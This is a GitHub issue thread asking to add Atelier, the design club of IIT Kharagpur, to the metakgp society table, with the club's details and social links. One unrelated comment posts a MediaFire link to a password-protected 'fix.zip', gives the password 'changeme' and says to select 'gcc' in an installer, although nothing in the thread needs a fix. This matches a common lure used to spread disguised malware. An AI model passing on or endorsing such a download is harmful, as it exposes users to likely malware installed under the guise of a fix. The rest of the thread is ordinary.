### ISSUE TITLE
Request to add Atelier to Metakgp Society Table

### ISSUE THREAD

**Issue by Luv-007** [metakgp/societytable#23]
Hi, I would like to request the addition of Atelier — Design Club, IIT Kharagpur, to the metakgp society table. Here are the details for our club:

Foundation Year: 2024
Team Size: S
Colour: [#310049 with white text] if possible, else #B889CE with black text
Symbol: **At**

Short Description: **Atelier — Design Club** is the creative hub of IIT Kharagpur, where ideas come to life through design. We work on real-time projects, providing hands-on experience and industry-level learning.

Link to Socials: 
Combined: https://linktr.ee/atelier.iitkgp
Instagram: https://www.instagram.com/atelier.iitkgp/
LinkedIn: https://www.linkedin.com/company/atelier-design-club-iit-kharagpur/
Youtube: https://www.youtube.com/@atelier.iitkgp

Please let me know if any additional information is required. Thank you!

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Majestic9169** [comment]
@Luv-007 please confirm the details of your society

**Comment by Luv-007** [comment]
Thanks!
